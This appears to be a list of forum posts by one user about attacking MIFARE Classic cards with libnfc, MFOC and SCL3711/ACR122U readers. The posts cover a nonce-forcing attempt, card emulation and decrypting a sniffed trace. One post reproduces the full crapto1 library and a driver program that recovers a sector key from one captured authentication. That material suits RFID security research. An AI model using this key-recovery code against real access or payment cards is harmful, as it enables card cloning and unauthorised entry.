UID looks like this:

UID[4]
a611efaa

RF technology:
Type A (ISO/IEC 14443 Type A)

Tag type:
Mifare Classic 4k

ATQA:
0002

SAK:
18

Well according to this information it should work. What reader and version of libnfc and MFOC are you using?

Is it a real card? Or is it emulated? Is the UID 7 byte long? Because if it is I don't know if MFOC works or if it does not

Unfortunately neither Mfoc nor SCL3711 works correctly under Windows (on my experience).

So I strongly suggest to use Ubuntu.. Using Ubuntu 13.04 and following the instruction here: https://gist.github.com/lmjabreu/5678039

you should have any problem.

bye

Hi,
I am trying to implement Nicolas Courtois attack.

For the second stage I need to get always the same nonce. However using an SCL3711, and the hints found here and in proxmark3 forum I am not able to achieve good results. Only few time I get a nonce twice.

At the moment I am using:

NP_ACTIVATE_FIELD, false to disable the RF field
sleep between 100-1100 ms (I did several time with time between these values)
NP_ACTIVATE_FIELD, enable the RF field

Anticollision
Authentication

than back to the top.

I already used a book between NFC reader and tag, to reduce the field but nothing change.
Any idea how to do that?

Thanks smile

Hi, using and scl3711 under ubuntu it should work great.

If you wish to recover all other sectors have seach a software called "MFOC",
after installing the libNfc library with this tool and the SCL3711 you should recover
all other data in less than a minute.
bye

Hallo,
Did anybody try MFOC against a Mifare emulated with a mobile phone?

I have to crack a Mifare classic emulated, but after more 100 probes no key come out. I have 10 sectors encrypted with default keys and other with private keys, so I have more then 1 sector to be used as exploit sector.
I am using MFOC 0.10.6 with an SCL3711 and libnfc 1.7.0-rc7.

I captured the traffic between the reader and the mobile phone and the difference between the answer of a card and the phone is that the phone sometime uses APDU to send data. However these data are correctly received at application layer (to MFOC). Any idea of what could be the problem? Timing due to the different type of command received?

Thanks, bye.

7

(2 replies, posted in NXP MIFARE Classic)

Thanks for your replay. Now I am trying to see if with some optimization is possible to do something with my readers. I bought an SCL3711 that looks much more stable in Ubuntu. Using it the UID emulation works perfectly.
Starting from this program I developed a card emulation able to exchange data with a mifare reader.

When I send the TAG Nonce looks like the scl3711 stop working. Here is the output:

R: 52 (7 bits)
T: 04  00 
R: 93  20 
T: 44  31  bb  58  96  [UID emulated]
R: 93  70  44  31  bb  58  96  8b  2a 
T: 08  b6  dd 
R: 60  08  bd  f7 
T: da  6d  79  d0  [card challenge]
error    libnfc.driver.pn53x_usb    Unable to write to USB (Connection timed out)
error    libnfc.driver.pn53x_usb    Unable to write to USB (Connection timed out)
error    libnfc.driver.pn53x_usb    Unable to write to USB (Connection timed out)
^C
Aborting current command...
error    libnfc.driver.pn53x_usb    Unable to write to USB (Connection timed out)
^C

After that all commands like nfc-list fails and I have to unplug the reader. Sniffing the channel the nonce is sent and the reader answer me and if I stop the program after "da  6d  79  d0" without read the answer or I send an other command all works smoothly (the reader does not crash). Any Idea how to avoid this behaviour?

8

(5 replies, posted in NXP MIFARE Classic)

I just bought from Clonemykey on ebay and the transaction has been perfect. bye

9

(10 replies, posted in Hardware Devices)

Unfortunately I don't know how to solve the situation.
All I can suggest is to try following this commands:

wget libnfc.googlecode.com/files/libnfc-1.7.0-rc4.tar.gz
tar -xvzf libnfc-1.7.0-rc4.tar.gz
rm libnfc-1.7.0-rc4.tar.gz
cd ~
cd libnfc-1.7.0-rc4
./configure --with-drivers=acr122_pcsc && make clean
make clean
make
make install
sudo sh -c "echo /usr/local/lib > /etc/ld.so.conf.d/usr-local-lib.conf"
sudo ldconfig
cd

That is the solution I found here. It worked for me.

1111 1111 1010 0000 1000 1110 1111 0101 ks4
0111 1101 1101 1110 1010 0110 1011 0011 comando

1000 0010 0111 1110 0010 1000 0100 0110


Hello, sorry I am new of this community. I read some thread about how to retrieve plain text from cipher-text after authentication.
But when I computer k4 to decrypt I get a different message respect what I expect.
R--> T        26
T --> R       04 00
R--> T        93 20
T --> R       2a 69 8d 43 8d
R--> T        93 70 2a 69 8d 43 8d
T --> R       08 b6 dd
R--> T        60 04 d1 3d
T --> R       3b ae 03 2d
R--> T        c4 94 a1 d2 6e 96 86 42
T --> R       84 66 05 9e
R--> T        7d de a6 b3
T --> R       e7 ee e3 ab 0f 89 bb ed 44 b1 91 ce ef 8a 4d ce
I got:
  Keystream used to generate {ar} and {at}:
  ks2: 1159b281
  ks3: 02fbbe4b

Found Key: [ffffffffffff]
I am trying to decrypt: 7d de a6 b3  that should be: 30 04 cd d1.
I did:
enc =  7d de a6 b3; (message encrypted)
I compute Ks4 as: k4 = enc ^ prng_successor(nt, 128);
ks4: ffa08ef5
And then
7d de a6 b3 XOR ffa08ef5 = 82 7E 28 44
Where I am I wrong?
I hope I did not duplicate an other thread but I did find the answer.
Thank you very much.

I post here a code that I found on proxymark forum that helped me to recover the key. I hope that will be useful also for someone else smile

//Test2.c
#define __STDC_FORMAT_MACROS
#include <inttypes.h>
#define llx PRIx64
#define lli PRIi64

// Test-file: test2.c
#include "crapto1.h"
#include <stdio.h>

int main (int argc, char *argv[]) {
  struct Crypto1State *revstate;
  uint64_t key;     // recovered key
  uint32_t uid;     // serial number
  uint32_t nt;      // tag challenge
  uint32_t nr_enc;  // encrypted reader challenge
  uint32_t ar_enc;  // encrypted reader response
  uint32_t at_enc;  // encrypted tag response
  uint32_t ks2;     // keystream used to encrypt reader response
  uint32_t ks3;     // keystream used to encrypt tag response

  printf("MIFARE Classic key recovery - based 64 bits of keystream\n");
  printf("Recover key from only one complete authentication!\n\n");

  if (argc < 6) {
    printf(" syntax: %s <uid> <nt> <{nr}> <{ar}> <{at}>\n\n",argv[0]);
    return 1;
  }

  sscanf(argv[1],"%x",&uid);
  sscanf(argv[2],"%x",&nt);
  sscanf(argv[3],"%x",&nr_enc);
  sscanf(argv[4],"%x",&ar_enc);
  sscanf(argv[5],"%x",&at_enc);

  printf("Recovering key for:\n");
  printf("  uid: %08x\n",uid);
  printf("   nt: %08x\n",nt);
  printf(" {nr}: %08x\n",nr_enc);
  printf(" {ar}: %08x\n",ar_enc);
  printf(" {at}: %08x\n",at_enc);



    // Generate lfsr succesors of the tag challenge
  printf("\nLFSR succesors of the tag challenge:\n");
  printf("  nt': %08x\n",prng_successor(nt, 64));
  printf(" nt'': %08x\n",prng_successor(nt, 96));

  // Extract the keystream from the messages
  printf("\nKeystream used to generate {ar} and {at}:\n");

  ks2 = ar_enc ^ prng_successor(nt, 64);
  ks3 = at_enc ^ prng_successor(nt, 96);

  printf("  ks2: %08x\n",ks2);
  printf("  ks3: %08x\n",ks3);
  

  revstate = lfsr_recovery64(ks2, ks3);
  lfsr_rollback_word(revstate, 0, 0);
  lfsr_rollback_word(revstate, 0, 0);
  lfsr_rollback_word(revstate, nr_enc, 1);
  lfsr_rollback_word(revstate, uid ^ nt, 0);
  crypto1_get_lfsr(revstate, &key);
  printf("\nFound Key5: [%012"llx"]\n\n",key);

  crypto1_destroy(revstate);

  return 0;
}

crapto1.c:

//crapto1.c
/*  crapto1.c

    This program is free software; you can redistribute it and/or
    modify it under the terms of the GNU General Public License
    as published by the Free Software Foundation; either version 2
    of the License, or (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program; if not, write to the Free Software
    Foundation, Inc., 51 Franklin Street, Fifth Floor,
    Boston, MA  02110-1301, US$

    Copyright (C) 2008-2008 bla <blapost@gmail.com>
*/
#include "crapto1.h"
#include <stdlib.h>

#if !defined LOWMEM && defined __GNUC__
static uint8_t filterlut[1 << 20];
static void __attribute__((constructor)) fill_lut()
{
        uint32_t i;
        for(i = 0; i < 1 << 20; ++i)
                filterlut[i] = filter(i);
}
#define filter(x) (filterlut[(x) & 0xfffff])
#endif

static void quicksort(uint32_t* const start, uint32_t* const stop)
{
    uint32_t *it = start + 1, *rit = stop;

    if(it > rit)
        return;

    while(it < rit)
        if(*it <= *start)
            ++it;
        else if(*rit > *start)
            --rit;
        else
            *it ^= (*it ^= *rit, *rit ^= *it);

    if(*rit >= *start)
        --rit;
    if(rit != start)
        *rit ^= (*rit ^= *start, *start ^= *rit);

    quicksort(start, rit - 1);
    quicksort(rit + 1, stop);
}
/** binsearch
 * Binary search for the first occurence of *stop's MSB in sorted [start,stop]
 */
static inline uint32_t* binsearch(uint32_t *start, uint32_t *stop)
{
    uint32_t mid, val = *stop & 0xff000000;
    while(start != stop)
        if(start[mid = (stop - start) >> 1] > val)
            stop = &start[mid];
        else
            start += mid + 1;

    return start;
}

/** update_contribution
 * helper, calculates the partial linear feedback contributions and puts in MSB
 */
static inline void
update_contribution(uint32_t *item, const uint32_t mask1, const uint32_t mask2)
{
    uint32_t p = *item >> 25;

    p = p << 1 | parity(*item & mask1);
    p = p << 1 | parity(*item & mask2);
    *item = p << 24 | (*item & 0xffffff);
}

/** extend_table
 * using a bit of the keystream extend the table of possible lfsr states
 */
static inline void
extend_table(uint32_t *tbl, uint32_t **end, int bit, int m1, int m2, uint32_t in)
{
    in <<= 24;
    for(*tbl <<= 1; tbl <= *end; *++tbl <<= 1)
        if(filter(*tbl) ^ filter(*tbl | 1)) {
            *tbl |= filter(*tbl) ^ bit;
            update_contribution(tbl, m1, m2);
            *tbl ^= in;
        } else if(filter(*tbl) == bit) {
            *++*end = tbl[1];
            tbl[1] = tbl[0] | 1;
            update_contribution(tbl, m1, m2);
            *tbl++ ^= in;
            update_contribution(tbl, m1, m2);
            *tbl ^= in;
        } else
            *tbl-- = *(*end)--;
}
/** extend_table_simple
 * using a bit of the keystream extend the table of possible lfsr states
 */
static inline void extend_table_simple(uint32_t *tbl, uint32_t **end, int bit)
{
    for(*tbl <<= 1; tbl <= *end; *++tbl <<= 1)
        if(filter(*tbl) ^ filter(*tbl | 1))
            *tbl |= filter(*tbl) ^ bit;
        else if(filter(*tbl) == bit) {
            *++*end = *++tbl;
            *tbl = tbl[-1] | 1;
        } else
            *tbl-- = *(*end)--;
}
/** recover
 * recursively narrow down the search space, 4 bits of keystream at a time
 */
static struct Crypto1State*
recover(uint32_t *o_head, uint32_t *o_tail, uint32_t oks,
    uint32_t *e_head, uint32_t *e_tail, uint32_t eks, int rem,
    struct Crypto1State *sl, uint32_t in)
{
    uint32_t *o, *e, i;

    if(rem == -1) {
        for(e = e_head; e <= e_tail; ++e) {
            *e = *e << 1 ^ parity(*e & LF_POLY_EVEN) ^ !!(in & 4);
            for(o = o_head; o <= o_tail; ++o, ++sl) {
                sl->even = *o;
                sl->odd = *e ^ parity(*o & LF_POLY_ODD);
                sl[1].odd = sl[1].even = 0;
            }
        }
        return sl;
    }

    for(i = 0; i < 4 && rem--; i++) {
        oks >>= 1;
        eks >>= 1;
        in >>= 2;
        extend_table(o_head, &o_tail, oks & 1, LF_POLY_EVEN << 1 | 1,
                 LF_POLY_ODD << 1, 0);
        if(o_head > o_tail)
            return sl;

        extend_table(e_head, &e_tail, eks & 1, LF_POLY_ODD,
                 LF_POLY_EVEN << 1 | 1, in & 3);
        if(e_head > e_tail)
            return sl;
    }

    quicksort(o_head, o_tail);
    quicksort(e_head, e_tail);

    while(o_tail >= o_head && e_tail >= e_head)
        if(((*o_tail ^ *e_tail) >> 24) == 0) {
            o_tail = binsearch(o_head, o = o_tail);
            e_tail = binsearch(e_head, e = e_tail);
            sl = recover(o_tail--, o, oks,
                     e_tail--, e, eks, rem, sl, in);
        }
        else if(*o_tail > *e_tail)
            o_tail = binsearch(o_head, o_tail) - 1;
        else
            e_tail = binsearch(e_head, e_tail) - 1;

    return sl;
}
/** lfsr_recovery
 * recover the state of the lfsr given 32 bits of the keystream
 * additionally you can use the in parameter to specify the value
 * that was fed into the lfsr at the time the keystream was generated
 */
struct Crypto1State* lfsr_recovery32(uint32_t ks2, uint32_t in)
{
    struct Crypto1State *statelist;
    uint32_t *odd_head = 0, *odd_tail = 0, oks = 0;
    uint32_t *even_head = 0, *even_tail = 0, eks = 0;
    int i;

    for(i = 31; i >= 0; i -= 2)
        oks = oks << 1 | BEBIT(ks2, i);
    for(i = 30; i >= 0; i -= 2)
        eks = eks << 1 | BEBIT(ks2, i);

    odd_head = odd_tail = malloc(sizeof(uint32_t) << 21);
    even_head = even_tail = malloc(sizeof(uint32_t) << 21);
    statelist =  malloc(sizeof(struct Crypto1State) << 18);
    if(!odd_tail-- || !even_tail-- || !statelist) {
        free(statelist);
        statelist = 0;
        goto out;
    }

    statelist->odd = statelist->even = 0;

    for(i = 1 << 20; i >= 0; --i) {
        if(filter(i) == (oks & 1))
            *++odd_tail = i;
        if(filter(i) == (eks & 1))
            *++even_tail = i;
    }

    for(i = 0; i < 4; i++) {
        extend_table_simple(odd_head,  &odd_tail, (oks >>= 1) & 1);
        extend_table_simple(even_head, &even_tail, (eks >>= 1) & 1);
    }

    in = (in >> 16 & 0xff) | (in << 16) | (in & 0xff00);
    recover(odd_head, odd_tail, oks,
        even_head, even_tail, eks, 11, statelist, in << 1);

out:
    free(odd_head);
    free(even_head);
    return statelist;
}

static const uint32_t S1[] = {     0x62141, 0x310A0, 0x18850, 0x0C428, 0x06214,
    0x0310A, 0x85E30, 0xC69AD, 0x634D6, 0xB5CDE, 0xDE8DA, 0x6F46D, 0xB3C83,
    0x59E41, 0xA8995, 0xD027F, 0x6813F, 0x3409F, 0x9E6FA};
static const uint32_t S2[] = {  0x3A557B00, 0x5D2ABD80, 0x2E955EC0, 0x174AAF60,
    0x0BA557B0, 0x05D2ABD8, 0x0449DE68, 0x048464B0, 0x42423258, 0x278192A8,
    0x156042D0, 0x0AB02168, 0x43F89B30, 0x61FC4D98, 0x765EAD48, 0x7D8FDD20,
    0x7EC7EE90, 0x7F63F748, 0x79117020};
static const uint32_t T1[] = {
    0x4F37D, 0x279BE, 0x97A6A, 0x4BD35, 0x25E9A, 0x12F4D, 0x097A6, 0x80D66,
    0xC4006, 0x62003, 0xB56B4, 0x5AB5A, 0xA9318, 0xD0F39, 0x6879C, 0xB057B,
    0x582BD, 0x2C15E, 0x160AF, 0x8F6E2, 0xC3DC4, 0xE5857, 0x72C2B, 0x39615,
    0x98DBF, 0xC806A, 0xE0680, 0x70340, 0x381A0, 0x98665, 0x4C332, 0xA272C};
static const uint32_t T2[] = {  0x3C88B810, 0x5E445C08, 0x2982A580, 0x14C152C0,
    0x4A60A960, 0x253054B0, 0x52982A58, 0x2FEC9EA8, 0x1156C4D0, 0x08AB6268,
    0x42F53AB0, 0x217A9D58, 0x161DC528, 0x0DAE6910, 0x46D73488, 0x25CB11C0,
    0x52E588E0, 0x6972C470, 0x34B96238, 0x5CFC3A98, 0x28DE96C8, 0x12CFC0E0,
    0x4967E070, 0x64B3F038, 0x74F97398, 0x7CDC3248, 0x38CE92A0, 0x1C674950,
    0x0E33A4A8, 0x01B959D0, 0x40DCACE8, 0x26CEDDF0};
static const uint32_t C1[] = { 0x846B5, 0x4235A, 0x211AD};
static const uint32_t C2[] = { 0x1A822E0, 0x21A822E0, 0x21A822E0};
/** Reverse 64 bits of keystream into possible cipher states
 * Variation mentioned in the paper. Somewhat optimized version
 */
struct Crypto1State* lfsr_recovery64(uint32_t ks2, uint32_t ks3)
{
    struct Crypto1State *statelist, *sl;
    uint8_t oks[32], eks[32], hi[32];
    uint32_t low = 0,  win = 0;
    uint32_t *tail, table[1 << 16];
    int i, j;

    sl = statelist = malloc(sizeof(struct Crypto1State) << 4);
    if(!sl)
        return 0;
    sl->odd = sl->even = 0;

    for(i = 30; i >= 0; i -= 2) {
        oks[i >> 1] = BEBIT(ks2, i);
        oks[16 + (i >> 1)] = BEBIT(ks3, i);
    }
    for(i = 31; i >= 0; i -= 2) {
        eks[i >> 1] = BEBIT(ks2, i);
        eks[16 + (i >> 1)] = BEBIT(ks3, i);
    }

    for(i = 0xfffff; i >= 0; --i) {
        if (filter(i) != oks[0])
            continue;

        *(tail = table) = i;
        for(j = 1; tail >= table && j < 29; ++j)
            extend_table_simple(table, &tail, oks[j]);

        if(tail < table)
            continue;

        for(j = 0; j < 19; ++j)
            low = low << 1 | parity(i & S1[j]);
        for(j = 0; j < 32; ++j)
            hi[j] = parity(i & T1[j]);

        for(; tail >= table; --tail) {
            for(j = 0; j < 3; ++j) {
                *tail = *tail << 1;
                *tail |= parity((i & C1[j]) ^ (*tail & C2[j]));
                if(filter(*tail) != oks[29 + j])
                    goto continue2;
            }

            for(j = 0; j < 19; ++j)
                win = win << 1 | parity(*tail & S2[j]);

            win ^= low;
            for(j = 0; j < 32; ++j) {
                win = win << 1 ^ hi[j] ^ parity(*tail & T2[j]);
                if(filter(win) != eks[j])
                    goto continue2;
            }

            *tail = *tail << 1 | parity(LF_POLY_EVEN & *tail);
            sl->odd = *tail ^ parity(LF_POLY_ODD & win);
            sl->even = win;
            ++sl;
            sl->odd = sl->even = 0;
            continue2:;
        }
    }
    return statelist;
}

/** lfsr_rollback_bit
 * Rollback the shift register in order to get previous states
 */
uint8_t lfsr_rollback_bit(struct Crypto1State *s, uint32_t in, int fb)
{
    int out;
    uint8_t ret;

    s->odd &= 0xffffff;
    s->odd ^= (s->odd ^= s->even, s->even ^= s->odd);

    out = s->even & 1;
    out ^= LF_POLY_EVEN & (s->even >>= 1);
    out ^= LF_POLY_ODD & s->odd;
    out ^= !!in;
    out ^= (ret = filter(s->odd)) & !!fb;

    s->even |= parity(out) << 23;
    return ret;
}
/** lfsr_rollback_byte
 * Rollback the shift register in order to get previous states
 */
uint8_t lfsr_rollback_byte(struct Crypto1State *s, uint32_t in, int fb)
{
    int i, ret = 0;
    for (i = 7; i >= 0; --i)
        ret |= lfsr_rollback_bit(s, BIT(in, i), fb) << i;
    return ret;
}
/** lfsr_rollback_word
 * Rollback the shift register in order to get previous states
 */
uint32_t lfsr_rollback_word(struct Crypto1State *s, uint32_t in, int fb)
{
    int i;
    uint32_t ret = 0;
    for (i = 31; i >= 0; --i)
        ret |= lfsr_rollback_bit(s, BEBIT(in, i), fb) << (i ^ 24);
    return ret;
}

/** nonce_distance
 * x,y valid tag nonces, then prng_successor(x, nonce_distance(x, y)) = y
 */
static uint16_t *dist = 0;
int nonce_distance(uint32_t from, uint32_t to)
{
    uint16_t x, i;
    if(!dist) {
        dist = malloc(2 << 16);
        if(!dist)
            return -1;
        for (x = i = 1; i; ++i) {
            dist[(x & 0xff) << 8 | x >> 8] = i;
            x = x >> 1 | (x ^ x >> 2 ^ x >> 3 ^ x >> 5) << 15;
        }
    }
    return (65535 + dist[to >> 16] - dist[from >> 16]) % 65535;
}


static uint32_t fastfwd[2][8] = {
    { 0, 0x4BC53, 0xECB1, 0x450E2, 0x25E29, 0x6E27A, 0x2B298, 0x60ECB},
    { 0, 0x1D962, 0x4BC53, 0x56531, 0xECB1, 0x135D3, 0x450E2, 0x58980}};
/** lfsr_prefix_ks
 *
 * Is an exported helper function from the common prefix attack
 * Described in the "dark side" paper. It returns an -1 terminated array
 * of possible partial(21 bit) secret state.
 * The required keystream(ks) needs to contain the keystream that was used to
 * encrypt the NACK which is observed when varying only the 3 last bits of Nr
 * only correct iff [NR_3] ^ NR_3 does not depend on Nr_3
 */
uint32_t *lfsr_prefix_ks(uint8_t ks[8], int isodd)
{
    uint32_t c, entry, *candidates = malloc(4 << 10);
    int i, size = 0, good;

    if(!candidates)
        return 0;

    for(i = 0; i < 1 << 21; ++i) {
        for(c = 0, good = 1; good && c < 8; ++c) {
            entry = i ^ fastfwd[isodd][c];
            good &= (BIT(ks[c], isodd) == filter(entry >> 1));
            good &= (BIT(ks[c], isodd + 2) == filter(entry));
        }
        if(good)
            candidates[size++] = i;
    }

    candidates[size] = -1;

    return candidates;
}

/** check_pfx_parity
 * helper function which eliminates possible secret states using parity bits
 */
static struct Crypto1State*
check_pfx_parity(uint32_t prefix, uint32_t rresp, uint8_t parities[8][8],
              uint32_t odd, uint32_t even, struct Crypto1State* sl)
{
    uint32_t ks1, nr, ks2, rr, ks3, c, good = 1;

    for(c = 0; good && c < 8; ++c) {
        sl->odd = odd ^ fastfwd[1][c];
        sl->even = even ^ fastfwd[0][c];

        lfsr_rollback_bit(sl, 0, 0);
        lfsr_rollback_bit(sl, 0, 0);

        ks3 = lfsr_rollback_bit(sl, 0, 0);
        ks2 = lfsr_rollback_word(sl, 0, 0);
        ks1 = lfsr_rollback_word(sl, prefix | c << 5, 1);

        nr = ks1 ^ (prefix | c << 5);
        rr = ks2 ^ rresp;

        good &= parity(nr & 0x000000ff) ^ parities[c][3] ^ BIT(ks2, 24);
        good &= parity(rr & 0xff000000) ^ parities[c][4] ^ BIT(ks2, 16);
        good &= parity(rr & 0x00ff0000) ^ parities[c][5] ^ BIT(ks2,  8);
        good &= parity(rr & 0x0000ff00) ^ parities[c][6] ^ BIT(ks2,  0);
        good &= parity(rr & 0x000000ff) ^ parities[c][7] ^ ks3;
    }

    return sl + good;
}


/** lfsr_common_prefix
 * Implentation of the common prefix attack.
 */
struct Crypto1State*
lfsr_common_prefix(uint32_t pfx, uint32_t rr, uint8_t ks[8], uint8_t par[8][8])
{
    struct Crypto1State *statelist, *s;
    uint32_t *odd, *even, *o, *e, top;

    odd = lfsr_prefix_ks(ks, 1);
    even = lfsr_prefix_ks(ks, 0);

    s = statelist = malloc((sizeof *statelist) << 20);
    if(!s || !odd || !even) {
        free(statelist);
        statelist = 0;
                goto out;
    }

    for(o = odd; *o + 1; ++o)
        for(e = even; *e + 1; ++e)
            for(top = 0; top < 64; ++top) {
                *o += 1 << 21;
                *e += (!(top & 7) + 1) << 21;
                s = check_pfx_parity(pfx, rr, par, *o, *e, s);
            }

    s->odd = s->even = 0;
out:
    free(odd);
    free(even);
    return statelist;
}

Crapto1.h:

//crapto1.h
/*  crapto1.h

    This program is free software; you can redistribute it and/or
    modify it under the terms of the GNU General Public License
    as published by the Free Software Foundation; either version 2
    of the License, or (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program; if not, write to the Free Software
    Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
    MA  02110-1301, US$

    Copyright (C) 2008-2008 bla <blapost@gmail.com>
*/
#ifndef CRAPTO1_INCLUDED
#define CRAPTO1_INCLUDED
#include <stdint.h>
#ifdef __cplusplus
extern "C" {
#endif

struct Crypto1State {uint32_t odd, even;};
struct Crypto1State* crypto1_create(uint64_t);
void crypto1_destroy(struct Crypto1State*);
void crypto1_get_lfsr(struct Crypto1State*, uint64_t*);
uint8_t crypto1_bit(struct Crypto1State*, uint8_t, int);
uint8_t crypto1_byte(struct Crypto1State*, uint8_t, int);
uint32_t crypto1_word(struct Crypto1State*, uint32_t, int);
uint32_t prng_successor(uint32_t x, uint32_t n);

struct Crypto1State* lfsr_recovery32(uint32_t ks2, uint32_t in);
struct Crypto1State* lfsr_recovery64(uint32_t ks2, uint32_t ks3);
uint32_t *lfsr_prefix_ks(uint8_t ks[8], int isodd);
struct Crypto1State*
lfsr_common_prefix(uint32_t pfx, uint32_t rr, uint8_t ks[8], uint8_t par[8][8]);

uint8_t lfsr_rollback_bit(struct Crypto1State* s, uint32_t in, int fb);
uint8_t lfsr_rollback_byte(struct Crypto1State* s, uint32_t in, int fb);
uint32_t lfsr_rollback_word(struct Crypto1State* s, uint32_t in, int fb);
int nonce_distance(uint32_t from, uint32_t to);
#define FOREACH_VALID_NONCE(N, FILTER, FSIZE)\
    uint32_t __n = 0,__M = 0, N = 0;\
    int __i;\
    for(; __n < 1 << 16; N = prng_successor(__M = ++__n, 16))\
        for(__i = FSIZE - 1; __i >= 0; __i--)\
            if(BIT(FILTER, __i) ^ parity(__M & 0xFF01))\
                break;\
            else if(__i)\
                __M = prng_successor(__M, (__i == 7) ? 48 : 8);\
            else

#define LF_POLY_ODD (0x29CE5C)
#define LF_POLY_EVEN (0x870804)
#define BIT(x, n) ((x) >> (n) & 1)
#define BEBIT(x, n) BIT(x, (n) ^ 24)
static inline int parity(uint32_t x)
{
#if !defined __i386__ || !defined __GNUC__
    x ^= x >> 16;
    x ^= x >> 8;
    x ^= x >> 4;
    return BIT(0x6996, x & 0xf);
#else
        asm(    "movl %1, %%eax\n"
        "mov %%ax, %%cx\n"
        "shrl $0x10, %%eax\n"
        "xor %%ax, %%cx\n"
                "xor %%ch, %%cl\n"
                "setpo %%al\n"
                "movzx %%al, %0\n": "=r"(x) : "r"(x): "eax","ecx");
    return x;
#endif
}
static inline int filter(uint32_t const x)
{
    uint32_t f;

    f  = 0xf22c0 >> (x       & 0xf) & 16;
    f |= 0x6c9c0 >> (x >>  4 & 0xf) &  8;
    f |= 0x3c8b0 >> (x >>  8 & 0xf) &  4;
    f |= 0x1e458 >> (x >> 12 & 0xf) &  2;
    f |= 0x0d938 >> (x >> 16 & 0xf) &  1;
    return BIT(0xEC57E80A, f);
}
#ifdef __cplusplus
}
#endif
#endif

crypto1.c

/*  crypto1.c

    This program is free software; you can redistribute it and/or
    modify it under the terms of the GNU General Public License
    as published by the Free Software Foundation; either version 2
    of the License, or (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program; if not, write to the Free Software
    Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
    MA  02110-1301, US

    Copyright (C) 2008-2008 bla <blapost@gmail.com>
*/
#include "crapto1.h"
#include <stdlib.h>

#define SWAPENDIAN(x)\
    (x = (x >> 8 & 0xff00ff) | (x & 0xff00ff) << 8, x = x >> 16 | x << 16)

struct Crypto1State * crypto1_create(uint64_t key)
{
    struct Crypto1State *s = malloc(sizeof(*s));
    int i;

    for(i = 47;s && i > 0; i -= 2) {
        s->odd  = s->odd  << 1 | BIT(key, (i - 1) ^ 7);
        s->even = s->even << 1 | BIT(key, i ^ 7);
    }
    return s;
}
void crypto1_destroy(struct Crypto1State *state)
{
    free(state);
}
void crypto1_get_lfsr(struct Crypto1State *state, uint64_t *lfsr)
{
    int i;
    for(*lfsr = 0, i = 23; i >= 0; --i) {
        *lfsr = *lfsr << 1 | BIT(state->odd, i ^ 3);
        *lfsr = *lfsr << 1 | BIT(state->even, i ^ 3);
    }
}
uint8_t crypto1_bit(struct Crypto1State *s, uint8_t in, int is_encrypted)
{
    uint32_t feedin;
    uint8_t ret = filter(s->odd);

    feedin  = ret & !!is_encrypted;
    feedin ^= !!in;
    feedin ^= LF_POLY_ODD & s->odd;
    feedin ^= LF_POLY_EVEN & s->even;
    s->even = s->even << 1 | parity(feedin);

    s->odd ^= (s->odd ^= s->even, s->even ^= s->odd);

    return ret;
}
uint8_t crypto1_byte(struct Crypto1State *s, uint8_t in, int is_encrypted)
{
    uint8_t i, ret = 0;

    for (i = 0; i < 8; ++i)
        ret |= crypto1_bit(s, BIT(in, i), is_encrypted) << i;

    return ret;
}
uint32_t crypto1_word(struct Crypto1State *s, uint32_t in, int is_encrypted)
{
    uint32_t i, ret = 0;

    for (i = 0; i < 32; ++i)
        ret |= crypto1_bit(s, BEBIT(in, i), is_encrypted) << (i ^ 24);

    return ret;
}

/* prng_successor
 * helper used to obscure the keystream during authentication
 */
uint32_t prng_successor(uint32_t x, uint32_t n)
{
    SWAPENDIAN(x);
    while(n--)
        x = x >> 1 | (x >> 16 ^ x >> 18 ^ x >> 19 ^ x >> 21) << 31;

    return SWAPENDIAN(x);
}

Solved I was working with a wrong capture. bye

11

(10 replies, posted in Hardware Devices)

Hi, I don't know if can work for you. But try to re install libnfc with the PCSC driver. Because you are using the USB driver, but the does not work really well.

To install the PCSC driver I think you should use:

./configure --with-drivers=acr122_pcsc

12

(0 replies, posted in NXP MIFARE Classic)

Hallo, I am using this tool to recover the information of a mifare classic.
Having all key A I can retrive all the information and dump them to an mfd file.
But there are not Key B inside of the mfd file. Even if using "Tag Info" application with the same Key
I can revocover all the data Included Key B of all secotor. How can I do the same thing with nfc-mfclassic tool?

Here is An example of sector:

00000004- 00 00 00 00  00 00 00 00  00 00 00 00  00 00 00 00 [................]
00000005- 00 00 00 00  00 00 00 00  00 00 00 00  00 00 00 00 [................]
00000006- 00 00 00 00  00 00 00 00  00 00 00 00  00 00 00 00 [................]
00000007- FF FF FF FF  FF FF FF 07  80 69 00 00  00 00 00 00 [.........i......]

Where both key are FF FF FF FF  FF FF FF but Here Key B is not present.

Thanks, bye

13

(0 replies, posted in Hardware Devices)

Hello, did anybody boy the OpenPCD2 reader?
Looking the website of the project it looks very promising, but I wish some feedback before buying it.
Someone tried it with libnfc without the LiveCD? Does it work correctly?

Thanks, bye.

ello, I wish to use mfoc version 0.10.3 but It is no more present in "nfc-tools.googlecode.com/svn/trunk/ " can anybody upload it please? I need that version because I need to use MFOC with libnfc 1.6.0-rc1.
Thanks

15

(2 replies, posted in NXP MIFARE Classic)

Hello, I wish to write e Mifare Classic Proxy.  Unfortunately I have only an ACR122U at the moment.
Using the anticollision example I made the part that pretend to be a  reader against the card.
Now I have to write the part predend to be a card.

I read that send a 5 byte UID is impossible using this reader due to the hard coded 0x08 of the first Byte. Is there any reader that can solve this problem?

Does anybody tried something like this?

Because reading the forum I understood that after the problem of 4byte UID this reader as also timing problem. So as far as I get my program won't work due to timeout will be triggered due to slow path to reach the reader.  Am I right?

Thank you very much. If I write this program I will post info about it.

Solved: I have MinGW64 and MinGW [requested for an other program]
and Cmake used the MinGW instead the other one.  After I uninstall MinGW it worked fine.

Hello, I understood what I missed. After a couple of time that I was able to generate correctly the library following the instructions I receive this error:

c:\nfc_build>mingw32-make
Scanning dependencies of target nfc
[  1%] Building C object libnfc/CMakeFiles/nfc.dir/nfc.c.obj
